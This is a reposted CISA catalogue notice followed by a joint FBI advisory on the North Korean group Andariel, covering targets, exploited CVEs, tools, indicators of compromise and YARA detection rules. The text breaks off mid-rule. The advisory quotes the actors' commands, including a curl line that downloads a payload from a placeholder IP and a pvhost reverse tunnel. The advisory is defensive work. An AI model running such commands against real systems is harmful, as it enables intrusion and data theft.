CISA Adds Six Known Exploited Vulnerabilities to Catalog


CISA has added six new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.

  • CVE-2024-38189 Microsoft Project Remote Code Execution Vulnerability
  • CVE-2024-38178 Microsoft Windows Scripting Engine Memory Corruption Vulnerability
  • CVE-2024-38213 Microsoft Windows SmartScreen Security Feature Bypass Vulnerability
  • CVE-2024-38193 Microsoft Windows Ancillary Function Driver for WinSock Privilege Escalation Vulnerability
  • CVE-2024-38106 Microsoft Windows Kernel Privilege Escalation Vulnerability
  • CVE-2024-38107 Microsoft Windows Power Dependency Coordinator Privilege Escalation Vulnerability

These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise.

Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information.

Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

Source…

North Korea Cyber Group Conducts Global Espionage Campaign to Advance Regime’s Military and Nuclear Programs


The U.S. Federal Bureau of Investigation (FBI) and the following authoring partners are releasing this Cybersecurity Advisory to highlight cyber espionage activity associated with the Democratic People’s Republic of Korea (DPRK)’s Reconnaissance General Bureau (RGB) 3rd Bureau based in Pyongyang and Sinuiju:

The RGB 3rd Bureau includes a DPRK (aka North Korean) state-sponsored cyber group known publicly as Andariel, Onyx Sleet (formerly PLUTONIUM), DarkSeoul, Silent Chollima, and Stonefly/Clasiopa. The group primarily targets defense, aerospace, nuclear, and engineering entities to obtain sensitive and classified technical information and intellectual property to advance the regime’s military and nuclear programs and ambitions. The authoring agencies believe the group and the cyber techniques remain an ongoing threat to various industry sectors worldwide, including but not limited to entities in their respective countries, as well as in Japan and India. RGB 3rd Bureau actors fund their espionage activity through ransomware operations against U.S. healthcare entities.

The actors gain initial access through widespread exploitation of web servers through known vulnerabilities in software, such as Log4j, to deploy a web shell and gain access to sensitive information and applications for further exploitation. The actors then employ standard system discovery and enumeration techniques, establish persistence using Scheduled Tasks, and perform privilege escalation using common credential stealing tools such as Mimikatz. The actors deploy and leverage custom malware implants, remote access tools (RATs), and open source tooling for execution, lateral movement, and data exfiltration. 

The actors also conduct phishing activity using malicious attachments, including Microsoft Windows Shortcut File (LNK) files or HTML Application (HTA) script files inside encrypted or unencrypted zip archives.

The authoring agencies encourage critical infrastructure organizations to apply patches for vulnerabilities in a timely manner, protect web servers from web shells, monitor endpoints for malicious activities, and strengthen authentication and remote access protections. While not exclusive, entities involved in or associated with the below industries and fields should remain vigilant in defending their networks from North Korea state-sponsored cyber operations:

Andariel (also known as Onyx Sleet, formerly PLUTONIUM, DarkSeoul, Silent Chollima, and Stonefly/Clasiopa) is a North Korean state-sponsored cyber group, under the RGB 3rd Bureau, based in Pyongyang and Sinuiju. The authoring agencies assess the group has evolved from conducting destructive attacks targeting U.S. and South Korean organizations to conducting specialized cyber espionage and ransomware operations.

The actors currently target sensitive military information and intellectual property of defense, aerospace, nuclear, engineering organizations. To a lesser extent, the group targets medical and energy industries. See Table 1 for more victimology information.

Table 1. Andariel Cyber Espionage Victimology
Industry  Information Targeted
Defense
  • Heavy and light tanks and self-propelled howitzers
  • Light strike vehicles and ammunition supply vehicles
  • Littoral combat ships and combatant craft
  • Submarines, torpedoes, unmanned underwater vehicles (UUVs), and autonomous underwater vehicles (AUVs)
  • Modeling and simulation services
Aerospace
  • Fighter aircraft and unmanned aerial vehicles (UAVs)
  • Missiles and missile defense systems
  • Satellites, satellite communications, and nano-satellite technology
  • Surveillance radar, phased-array radar, and other radar systems
Nuclear
  • Uranium processing and enrichment
  • Material waste and storage
  • Nuclear power plants
  • Government nuclear facilities and research institutes
Engineering
  • Shipbuilding and marine engineering
  • Robot machinery and mechanical arms
  • Additive manufacturing and 3D printing components and technology
  • Casting, fabrication, high-heat metal molding, and rubber and plastic molding
  • Machining processes and technology

The information targeted—such as contract specifications, bills of materials, project details, design drawings, and engineering documents—has military and civilian applications and leads the authoring agencies to assess one of the group’s chief responsibilities as satisfying collection requirements for Pyongyang’s nuclear and defense programs.

Ransomware

Andariel actors fund their espionage activity through ransomware operations against U.S. healthcare entities, and in some instances, the authoring agencies have observed the actors launching ransomware attacks and conducting cyber espionage operations on the same day and/or leveraging ransomware and cyber espionage against the same entity. For more information on this ransomware activity, see joint advisories #StopRansomware: Ransomware Attacks on Critical Infrastructure Fund DPRK Malicious Cyber Activities and North Korean State-Sponsored Cyber Actors Use Maui Ransomware to Target the Healthcare and Public Health Sector.

Malicious Cyber Espionage Activity

This advisory uses the MITRE ATT&CK for Enterprise framework, version 15. See the Appendix: MITRE ATT&CK Techniques for all referenced tactics and techniques.

Reconnaissance and Enumeration

While there is limited available information on the group’s initial reconnaissance methods, the actors likely identify vulnerable systems using publicly available internet scanning tools that reveal information such as vulnerabilities in public-facing web servers [T1595, T1592]. The actors gather open source information about their victims for use in targeting [T1591] and research Common Vulnerabilities and Exposures (CVEs) when published to the National Institute of Standards and Technology (NIST) National Vulnerability Database [T1596]. CVEs researched include:

  • CVE-2023-46604 – Apache ActiveMQ
  • CVE-2023-42793 – TeamCity 
  • CVE-2023-3519 – Citrix NetScaler
  • CVE-2023-35078 – Ivanti Endpoint Manager Mobile (EPMM) 
  • CVE-2023-34362 – MOVEIt 
  • CVE-2023-33246 – RocketMQ 
  • CVE-2023-32784 – KeePass 
  • CVE-2023-32315 – Openfire 
  • CVE-2023-3079 – Google Chromium V8 Type Confusion
  • CVE-2023-28771 and CVE-2023-33010 – Zyxell firmware
  • CVE-2023-2868 – Barracuda Email Security Gateway
  • CVE-2023-27997 – FortiGate SSL VPN 
  • CVE-2023-25690 – Apache HTTP Server
  • CVE-2023-21932 – Oracle Hospitality Opera 5
  • CVE-2023-0669 – GoAnywhere MFT
  • CVE-2022-47966 – ManageEngine 
  • CVE-2022-41352 and CVE-2022-27925 – Zimbra Collaboration Suite
  • CVE-2022-30190 – Microsoft Windows Support Diagnostic Tool
  • CVE-2022-25064 – TP-LINK 
  • CVE-2022-24990 and CVE-2021-45837 – TerraMaster NAS
  • CVE-2022-24785 – Moment.js 
  • CVE-2022-24665, CVE-2022-24664, and CVE-2022-24663 – PHP Everywhere 
  • CVE-2022-22965 – Spring4Shell
  • CVE-2022-22947 – Spring Cloud Gateway 
  • CVE-2022-22005 – Microsoft SharePoint Server 
  • CVE-2022-21882 – Win32k Elevation of Privilege 
  • CVE-2021-44228 – Apache Log4j 
  • CVE-2021-44142 – Samba vfs_fruit module 
  • CVE-2021-43226, CEV-2021-43207, CVE-2021-36955 – Windows log file vulnerabilities
  • CVE-2021-41773 – Apache HTTP Server 2.4.49
  • CVE-2021-40684 – Talend ESB Runtime 
  • CVE-2021-3018 – IPeakCMS 3.5 
  • CVE-2021-20038 – SMA100 Apache httpd server (SonicWall) 
  • CVE-2021-20028 – SonicWall Secure Remote Access (SRA) 
  • CVE-2019-15637 – Tableau 
  • CVE-2019-7609 – Kibana
  • CVE-2019-0708 – Microsoft Remote Desktop Services 
  • CVE-2017-4946 – VMware V4H and V4PA

Resource Development, Tooling, and Remote Access Tools

The actors leverage custom tools and malware for discovery and execution. Over the last 15 years, the group has developed RATs, including the following, to permit remote access and manipulation of systems and lateral movement.

  • Atharvan
  • ELF Backdoor
  • Jupiter
  • MagicRAT
  • “No Pineapple”
  • TigerRAT
  • Valefor/VSingle
  • ValidAlpha
  • YamaBot
  • NukeSped
  • Goat RAT
  • Black RAT
  • AndarLoader
  • DurianBeacon
  • Trifaux
  • KaosRAT
  • Preft
  • Andariel Scheduled Task Malware
  • BottomLoader (see Cisco Talos blog Operation Blacksmith)
  • NineRAT (see Cisco Talos blog Operation Blacksmith)
  • DLang (see Cisco Talos blog Operation Blacksmith)
  • Nestdoor (see AhnLab blog)

These tools include functionality for executing arbitrary commands, keylogging, screenshots, listing files and directories, browser history retrieval, process snooping, creating and writing to files, capturing network connections, and uploading content to command and control (C2) [T1587.001, T1587.004]. The tools allow the actors to maintain access to the victim system with each implant having a designated C2 node.

Commodity Malware

Commodity malware is malicious software widely available for purchase or use and is leveraged by numerous different threat actors. The use of publicly available malware enables the actors to conceal and obfuscate their identities and leads to attribution problems. The authoring agencies are reliant on the use of custom malware and loaders, along with overlapping C2 nodes to attribute commodity malware to the actors. The actors have at times achieved great success leveraging just open source malware. The authoring agencies have identified the following open-source tools as used and/or customized by the actors:

Initial Access

The actors gain initial access through widespread exploitation of web servers through known vulnerabilities, such as CVE-2021-44228 (“Log4Shell”) in Apache’s Log4j software library and other CVEs listed above, to deploy web shells and gain access to sensitive information and applications for further exploitation. The actors continue to breach organizations by exploiting web server vulnerabilities in public-facing devices and have conducted widespread activity against a number of different organizations simultaneously [T1190].

Execution

The actors are well-versed in using native tools and processes on systems, known as living off the land (LOTL). They use Windows command line, PowerShell, Windows Management Instrumentation command line (WMIC), and Linux bash, for system, network, and account enumeration. While individual commands typically vary, the authoring agencies assess the actors prefer netstat commands, such as netstat –naop and netstat –noa [T1059]. Example commands used by the actors include the following:

  • netstat –naop 
  • netstat –noa
  • pvhost.exe -N -R [IP Address]:[Port] -P [Port] -l [username] -pw [password]
  • curl hxxp[://][IP Address]/tmp/tmp/comp[.]dat -o c:\users\public\notify[.]exe
  • C:\windows\system32\cmd.exe /c systeminfo | findstr Logon

These actors often make typos and other mistakes, indicating that the commands are not directly copied from a playbook and the actors have a flexible and impromptu approach. The typos also illustrate a poor grasp of the English language, including common errors such as “Microsoft Cooperation” (rather than “Microsoft Corporation”) found across numerous RGB 3rd Bureau malware samples.

Defense Evasion

The actors routinely pack late-stage tooling in VMProtect and Themida. Malicious tooling packed with these and other commercial tools have advanced anti-debugging and detection capabilities. These files are typically multiple megabytes in size and often contain unusual file section names such as vmp0 and vmp1 for VMProtect and Themida or randomized file section names for Themida [T1027].

Credential Access

The actors employ a multi-pronged approach to stealing credentials to gain additional access to systems, including the use of publicly available credential theft tools such as Mimikatz, ProcDump, and Dumpert and accessing the Active Directory domain database through targeting of the NTDS.dit file. The authoring agencies assess the actors change settings on compromised systems to force the system to store credentials and then use the aforementioned tools to steal credentials. In one instance, the actors used the vssadmin command-line utility to back up a volume to retrieve a copy of the NTDS.dit file containing Active Directory data. In another instance, the actors were observed collecting registry hive data for offline extraction of credentials [T1003].

Discovery

The actors used customized file system enumeration tooling written in .NET. The tool is capable of receiving and executing command line arguments to enumerate directories and files and compress output files. The tool collects the following information for each drive targeted on a system: depth relative to starting path, name, last write time, last access time, creation time, size, and attributes [T1087, T1083]. 

The actors also enumerate directories and files of connected devices using Server Message Block (SMB) protocol, which enables network file sharing and the ability to request services and programs from a network [T1021.002].

Lateral Movement

The actors also use system logging for discovery to move laterally. The group logs active window changes, clipboard data, and keystrokes and saves the collected logging information to the %Temp% directory.

The actors have also used Remote Desktop Protocol (RDP) to move laterally [T1021].

Command and Control

The actors leverage techniques and infrastructure positioned around the world to send commands to compromised systems. The actors disguise their malware within HTTP packets to appear as benign network traffic. They also use tunneling tools such as 3Proxy, PLINK, and Stunnel as well as custom proxy tunneling tools to tunnel traffic over a variety of protocols from inside a network back to a C2 server. Tunneling enables the actors to perform C2 operations despite network configurations that would typically pose a challenge, such as the use of Network Address Translation (NAT) or traffic funneled through a web proxy [T1090, T1071].

Collection and Exfiltration

Malware previously used by the actors permitted placement and access to search through files that could be of interest, including scanning computer files for keywords related to defense and military sectors in English and Korean. The actors identify data for theft by enumerating files and folders across many directories and servers using command-line activity or functionality built into custom tools. The actors collect the relevant files into RAR archives, sometimes using a version of WinRAR brought into the victim’s environment with other malicious tooling [T1560, T1039].

The actors typically exfiltrate data to web services such as cloud storage or servers not associated with their primary C2. Notably, the actors have been observed logging into actor-controlled cloud-based storage service accounts directly from victim networks to exfiltrate data [T1567]. The actors have also been observed using the utilities PuTTY and WinSCP to exfiltrate data to North Korea-controlled servers via File Transfer Protocol (FTP) and other protocols [T1048].

The actors have also been identified staging files for exfiltration on victim machines, establishing Remote Desktop Protocol connections, and conducting HTTP GET requests on port 80 to receive information [T1021].

Indicators of Compromise

See below for Andariel IOCs.

The following include observed MD5 hashes:

  • 88a7c84ac7f7ed310b5ee791ec8bd6c5
  • 6ab4eb4c23c9e419fbba85884ea141f4
  • 97ce00c7ef1f7d98b48291d73d900181
  • 079b4588eaa99a1e802adf5e0b26d8aa
  • 0873b5744d8ab6e3fe7c9754cf7761a3
  • 0d696d27bae69a62def82e308d28857a
  • 0ecf4bac2b070cf40f0b17e18ce312e6
  • 17c46ed7b80c2e4dbea6d0e88ea0827c
  • 1f2410c3c25dadf9e0943cd634558800
  • 2968c20a07cfc97a167aa3dd54124cda
  • 33e85d0f3ef2020cdb0fc3c8d80e8e69
  • 4118d9adce7350c3eedeb056a3335346
  • 4aa57e1c66c2e01f2da3f106ed2303fa
  • 58ad3103295afcc22bde8d81e77c282f
  • 5c41cbf8a7620e10f158f6b70963d1cb
  • 61a949553d35f31957db6442f36730c5
  • 72a22afde3f820422cfdbba7a4cbabde
  • 84bd45e223b018e67e4662c057f2c47e
  • 86465d92f0d690b62866f52f5283b9fc
  • 8b395cc6ecdec0900facf6e93ec48fbb
  • 97f352e2808c78eef9b31c758ca13032
  • a50f3b7aa11b977ae89285b60968aa67
  • afd25ce56b9808c5ed7eade75d2e12a7
  • afdeb24975a318fc5f20d9e61422a308
  • b697b81b341692a0b137b2c748310ea7
  • bcac28919fa33704a01d7a9e5e3ddf3f
  • c027d641c4c1e9d9ad048cda2af85db6
  • c892c60817e6399f939987bd2bf5dee0
  • cdeae978f3293f4e783761bc61b34810
  • d0f310c99476f1712ac082f78dd29fdc
  • d8da33fae924b991b776797ba8cde24c
  • e230c5728f9ea5a94e390e7da7bf1ffa
  • f4d46629ca15313b94992f3798718df7
  • fb84a392601fc19aeb7f8ce11b3a4907
  • ff3194d3d5810a42858f3e22c91500b1
  • 13b4ce1fc26d400d34ede460a8530d93
  • 41895c5416fdc82f7e0babc6bb6c7216
  • c2f8c9bb7df688d0a7030a96314bb493
  • 33a3da2de78418b89a603e28a1e8852c
  • 4896da30a745079cd6265b6332886d45
  • 73eb2f4f101aab6158c615094f7a632a
  • 7f33d2d2a2ce9c195202acb59de31eee
  • e1afd01400ef405e46091e8ef10c721c
  • fe25c192875ec1914b8880ea3896cda2
  • 232586f8cfe82b80fd0dfa6ed8795c56
  • c1f266f7ec886278f030e7d7cd4e9131
  • 49bb2ad67a8c5dfbfe8db2169e6fa46e
  • beb199b15bd075996fa8d6a0ed554ca8
  • 4053ca3e37ed1f8d37b29eed61c2e729
  • 3a0c8ae783116c1840740417c4fbe678
  • 0414a2ab718d44bf6f7103cff287b312
  • ca564428a29faf1a613f35d9fa36313f
  • ad6d4eb34d29e350f96dc8df6d8a092e
  • dc70dc9845aa747001ebf2a02467c203
  • 3d2ec58f37c8176e0dbcc47ff93e5a76
  • 0a09b7f2317b3d5f057180be6b6d0755
  • 1ffccc23fef2964e9b1747098c19d956
  • 9112efb49cae021abebd3e9a564e6ca4
  • ac0ada011f1544aa3a1cf27a26f2e288
  • 0211a3160cc5871cbcd4e5514449162b
  • 7416ea48102e2715c87edd49ddbd1526
  • a2aefb7ab6c644aa8eeb482e27b2dbc4
  • e7fd7f48fbf5635a04e302af50dfb651
  • 33b2b5b7c830c34c688cf6ced287e5be
  • e5410abaaac69c88db84ab3d0e9485ac
  • eb35b75369805e7a6371577b1d2c4531
  • 5a3f3f75048b9cec177838fb8b40b945
  • 9d7bd0caed10cc002670faff7ca130f5
  • 8434cdd34425916be234b19f933ad7ea
  • bbaee4fe73ccff1097d635422fdc0483
  • 79e474e056b4798e0a3e7c60dd67fd28
  • 95c276215dcc1bd7606c0cb2be06bf70
  • 426bb55531e8e3055c942a1a035e46b9
  • cfae52529468034dbbb40c9a985fa504
  • deae4be61c90ad6d499f5bdac5dad242
  • bda0686d02a8b7685adf937cbcd35f46
  • 6de6c27ca8f4e00f0b3e8ff5185a59d1
  • c61a8c4f6f6870c7ca0013e084b893d2
  • 5291aed100cc48415636c4875592f70c
  • f4795f7aec4389c8323f7f40b50ae46f
  • cf1a90e458966bcba8286d46d6ab052c
  • 792370eb01e16ac3dc511143932d0e1d
  • 612538328e0c4f3e445fb58ef811336a
  • 9767aa592ec2d6ae3c7d40b6049d0466
  • b22fd0604c4f189f2b7a59c8f48882dd
  • e53ca714787a86c13f07942a56d64efa
  • c7b09f1dd0a5694de677f3ecceda41b7
  • c8346b39418f92725719f364068a218d
  • 730bff14e80ffd7737a97cdf11362ab5
  • 9a481bc83fea1dea3e3bdfff5e154d44
  • ddb1f970371fa32faae61fc5b8423d4b
  • 6c2b947921e7c77d9af62ce9a3ed7621
  • 977d30b261f64cc582b48960909d0a89
  • 7ce51b56a6b0f8f78056ddfc5b5de67c
  • dd9625be4a1201c6dfb205c12cf3a381
  • ecb4a09618e2aba77ea37bd011d7d7f7
  • 0fd8c6f56c52c21c061a94e5765b27b4
  • c90d094a8fbeaa8a0083c7372bfc1897
  • 0055a266aa536b2fdadb3336ef8d4fba
  • 55bb271bbbf19108fec73d224c9b4218
  • 0c046a2f5304ed8d768795a49b99d6e4
  • f34664e0d9a10974da117c1ca859dba8
  • a2c2099d503fcc29478205f5aef0283b
  • e439f850aa8ead560c99a8d93e472225
  • 7c30ed6a612a1fd252565300c03c7523
  • 81738405a7783c09906da5c7212e606b
  • c027d641c4c1e9d9ad048cda2af85db6
  • eb7ba9f7424dffdb7d695b00007a3c6d
  • 3e9ee5982e3054dc76d3ba5cc88ae3de
  • 073e3170a8e7537ff985ec8316319351
  • 9b0e7c460a80f740d455a7521f0eada1
  • 2d02f5499d35a8dffb4c8bc0b7fec5c2
  • 0984954526232f7d05910aa5b07c5893
  • 4156a7283284ece739e1bae05f99e17c
  • 3026d419ee140f3c6acd5bff54132795
  • 7aa132c0cc63a38fb4d1789553266fc7
  • 1a0811472fad0ff507a92c957542fffd
  • f8aef59d0c5afe8df31e11a1984fbc0a
  • 82491b42b9a2d34b13137e36784a67d7
  • 0a199944f757d5615164e8808a3c712a
  • 9c97ea18da290a6833a1d36e2d419efc
  • 16f768eac33f79775a9672018e0d64f5

The following include observed SHA-256 hashes:

  • ed8ec7a8dd089019cfd29143f008fa0951c56a35d73b2e1b274315152d0c0ee6
  • db6a9934570fa98a93a979e7e0e218e0c9710e5a787b18c6948f2eedd9338984
  • 773760fd71d52457ba53a314f15dddb1a74e8b2f5a90e5e150dea48a21aa76df
  • 05e9fe8e9e693cb073ba82096c291145c953ca3a3f8b3974f9c66d15c1a3a11d
  • e3027062e602c5d1812c039739e2f93fc78341a67b77692567a4690935123abe
  • 1962ebb7bf8d2b306c6f3b55c3dcd69a755eeff1a17577b7606894b781841c3a
  • f226086b5959eb96bd30dec0ffcbf0f09186cd11721507f416f1c39901addafb
  • 6db57bbc2d07343dd6ceba0f53c73756af78f09fe1cb5ce8e8008e5e7242eae1
  • b7435d23769e79fcbe69b28df4aef062685d1a631892c2354f96d833eae467be
  • 66415464a0795d0569efa5cb5664785f74ed0b92a593280d689f3a2ac68dca66
  • def2f01fbd4be85f48101e5ab7ddd82efb720e67daa6838f30fd8dcda1977563
  • 323cbe7a3d050230cfaa822c2a22160b4f8c5fe65481dd329841ee2754b522d9
  • 74529dd15d1953a47f0d7ecc2916b2b92865274a106e453a24943ca9ee434643
  • 1e4de822695570421eb2f12fdfe1d32ab8639655e12180a7ab3cf429e7811b8f
  • 8ce219552e235dcaf1c694be122d6339ed4ff8df70bf358cd165e6eb487ccfc5
  • c2904dc8bbb569536c742fca0c51a766e836d0da8fac1c1abd99744e9b50164f
  • dda53eee2c5cb0abdbf5242f5e82f4de83898b6a9dd8aa935c2be29bafc9a469
  • 90fb0cd574155fd8667d20f97ac464eca67bdb6a8ee64184159362d45d79b6a4
  • 452ca47230afd4bb85c45af54fcacbfa544208ef8b4604c3c5caefe3a64dcc19
  • 199ba618efc6af9280c5abd86c09cdf2d475c09c8c7ffc393a35c3d70277aed1
  • 2eb16dbc1097a590f07787ab285a013f5fe235287cb4fb948d4f9cce9efa5dbc
  • ce779e30502ecee991260fd342cc0d7d5f73d1a070395b4120b8d300ad11d694
  • db6a9934570fa98a93a979e7e0e218e0c9710e5a787b18c6948f2eedd9338984
  • c28bb61de4a6ad1c5e225ad9ec2eaf4a6c8ccfff40cf45a640499c0adb0d8740
  • 34d5a5d8bec893519f204b573c33d54537b093c52df01b3d8c518af08ee94947
  • 664f8d19af3400a325998b332343a9304f03bab9738ddab1530869eff13dae54
  • 772b06f34facf6a2ce351b8679ff957cf601ef3ad29645935cb050b4184c8d51
  • aa29bf4292b68d197f4d8ca026b97ec7785796edcb644db625a8f8b66733ab54
  • 9a5504dcfb7e664259bfa58c46cfd33e554225daf1cedea2ec2a9d83bbbfe238
  • c2500a6e12f22b16e221ba01952b69c92278cd05632283d8b84c55c916efe27c
  • 8aa6612c95c7cef49709596da43a0f8354f14d8c08128c4cb9b1f37e548f083b
  • 38f0f2d658e09c57fc78698482f2f638843eb53412d860fb3a99bb6f51025b07

The following include a list of user agent strings used by the actors:

  • Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
  • Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
  • Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0
  • Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
  • Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
  • Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0
  • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
  • Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
  • Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
  • Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
  • Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
  • Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0

Detection Methods

See Table 2 for YARA rules, created by the FBI, authoring partners, and private industry, that can be used to detect malware used by the actors.

Table 2. YARA Rules
rule Andariel_ScheduledTask_Loader
{
    strings:
        $obfuscation1 = { B8 02 00 00 00 48 6B C0 00 B9 CD FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 01 B9 CC FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 02 B9 8D FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 03 B9 9A FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 04 B9 8C FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 05 B9 8A FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 06 33 C9 66 89 8C 04 60 01 00 00 }
                             $obfuscation2 = { 48 6B C0 02 C6 44 04 20 BA B8 01 00 00 00 48 6B C0 03 C6 44 04 20 9A B8 01 00 00 00 48 6B C0 04 C6 44 04 20 8B B8 01 00 00 00 48 6B C0 05 C6 44 04 20 8A B8 01 00 00 00 48 6B C0 06 C6 44 04 20 9C B8 01 00 00 00 }
                             $obfuscation3 = { 48 6B C0 00 C6 44 04 20 A8 B8 01 00 00 00 48 6B C0 01 C6 44 04 20 9A B8 01 00 00 00 48 6B C0 02 C6 44 04 20 93 B8 01 00 00 00 48 6B C0 03 C6 44 04 20 96 B8 01 00 00 00 48 6B C0 04 C6 44 04 20 B9 B8 01 00 00 00 48 6B C0 05 C6 44 04 20 9A B8 01 00 00 00 48 6B C0 06 C6 44 04 20 8B B8 01 00 00 00 48 6B C0 07 C6 44 04 20 9E B8 01 00 00 00 48 6B C0 08 C6 44 04 20 9A B8 01 00 00 00 48 6B C0 09 C6 44 04 20 8D B8 01 00 00 00 48 6B C0 0A C6 44 04 20 BC B8 01 00 00 00 }
    condition:
        uint16(0) == 0x5A4D and $obfuscation1 and $obfuscation2 and $obfuscation3
}
rule Andariel_KaosRAT_Yamabot
{

    strings:
        $str1 = “/kaos/”
        $str2 = “Abstand [“
        $str3 = “] anwenden”
        $str4 = “cmVjYXB0Y2hh”
        $str5 = “/bin/sh”
        $str6 = “utilities.CIpaddress”
        $str7 = “engine.NewEgg”
        $str8 = “%s%04x%s%s%s”
        $str9 = “Y2FwdGNoYV9zZXNzaW9u”
        $str10 = “utilities.EierKochen”
        $str11 = “kandidatKaufhaus”

    condition:
        3 of them
}

rule TriFaux_EasyRAT_JUPITER
{
    strings:
        $InitOnce = “InitOnceExecuteOnce”
        $BREAK = { 0D 00 0A 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 0D 00 0A }
                             $Bytes = “4C,$00,$00,$00,$01,$14,$02,$00,$00,$00,$00,$00,$C0,$00,$00,$00,$00,$00,$00,” wide
    condition:
        uint16(0) == 0x5a4d and all of them
}
rule Andariel_CutieDrop_MagicRAT
{
              strings:
                             $config_os_w = “os/windows” ascii wide
                             $config_os_l = “os/linux” ascii wide
                             $config_os_m = “os/mac” ascii wide
                             $config_comp_msft = “company/microsoft” ascii wide
                             $config_comp_orcl = “company/oracle” ascii wide
                             $POST_field_1 = “session=” ascii wide
                             $POST_field_2 = “type=” ascii wide
                             $POST_field_3 = “id=” ascii wide
                             $command_misspelled = “renmae” ascii wide
              condition:
                             uint16(0) == 0x5a4d and 7 of them
rule Andariel_hhsd_FileTransferTool
{

    strings:
        // 30 4D C7                xor     [rbp+buffer_v41+3], cl
        // 81 7D C4 22 C0 78 00    cmp      dword ptr [rbp+buffer_v41], 78C022h
        // 44 88 83 00 01 00 00    mov      [rbx+100h], r8b
        $handshake = { 30 ?? ?? 81 7? ?? 22 C0 78 00 4? 88 }
        
        // B1 14                   mov     cl, 14h
        // C7 45 F7 14 00 41 00    mov      [rbp+57h+Src], 410014h
        // C7 45 FB 7A 00 7F 00    mov      [rbp+57h+var_5C], 7F007Ah
        // C7 45 FF 7B 00 63 00    mov     [rbp+57h+var_58], 63007Bh
        // C7 45 03 7A 00 34 00    mov      [rbp+57h+var_54], 34007Ah
        // C7 45 07 51 00 66 00    mov      [rbp+57h+var_50], 660051h
        // C7 45 0B 66 00 7B 00    mov      [rbp+57h+var_4C], 7B0066h
        // C7 45 0F 66 00 00 00    mov      [rbp+57h+var_48], 66h ; ‘f’
        $err_xor_str = { 14 C7 [2] 14 00 41 00 C7 [2] 7A 00 7F 00 C7 [2] 7B 00 63 00 C7 [2] 7A 00 34 00 }
        
        // 41 02 D0                add     dl, r8b
        // 44 02 DA                add     r11b, dl
        // 3C 1F                   cmp     al, 1Fh
        $buf_add_cmp_1f = { 4? 02 ?? 4? 02 ?? 3? 1F }

        // B9 8D 10 B7 F8          mov     ecx, 0F8B7108Dh
        // E8 F1 BA FF FF          call    sub_140001280
        $hash_call_loadlib = { B? 8D 10 B7 F8 E8 }
        $hash_call_unk = { B? 91 B8 F6 88 E8 }
        
    condition:
        uint16(0) == 0x5a4d and
        (any of ($handshake, $err_xor_str, $buf_add_cmp_1f) and any of ($hash_call_*)) or
        2 of ($handshake, $err_xor_str, $buf_add_cmp_1f)
rule Andariel_Atharvan_3RAT
{
strings:
$3RAT = “D:\\rang\\TOOL\\3RAT” 
$atharvan = “Atharvan_dll.pdb”
condition:
uint16(0) == 0x5a4d and any of them
}
rule Andariel_LilithRAT_Variant
{
    strings:
        // The following are strings seen in the open source version of Lilith
        $lilith_1 = “Initiate a CMD session first.” ascii wide
        $lilith_2 = “CMD is not open” ascii wide
        $lilith_3 = “Couldn’t write command” ascii wide
        $lilith_4 = “Couldn’t write to CMD: CMD not open” ascii wide

        // The following are strings that appear to be unique to the Unnamed Trojan based on Lilith
        $unique_1 = “Upload Error!” ascii wide
        $unique_2 = “ERROR: Downloading is already running!” ascii wide
        $unique_3 = “ERROR: Unable to open file:” ascii wide
        $unique_4 = “General error” ascii wide
        $unique_5 = “CMD error” ascii wide
        $unique_6 = “killing self” ascii wide
    condition:
        uint16(0) == 0x5a4d and filesize }

rule Andariel_SocksTroy_Strings_OpCodes
{
       strings:
        $strHost = “-host” wide
        $strAuth = “-auth” wide
        $SocksTroy = “SocksTroy” 
        $cOpCodeCheck = { 81 E? A0 00 00 00 0F 84 ?? ?? ?? ?? 83 E? 03 74 ?? 83 E? 02 74 ?? 83 F? 0B }
    condition:
        uint16(0) == 0x5a4d and
        ((1 of ($str*)) and 
        (all of ($c*)) or (all of ($Socks*)))
}
rule Andariel_Agni
{
    strings:
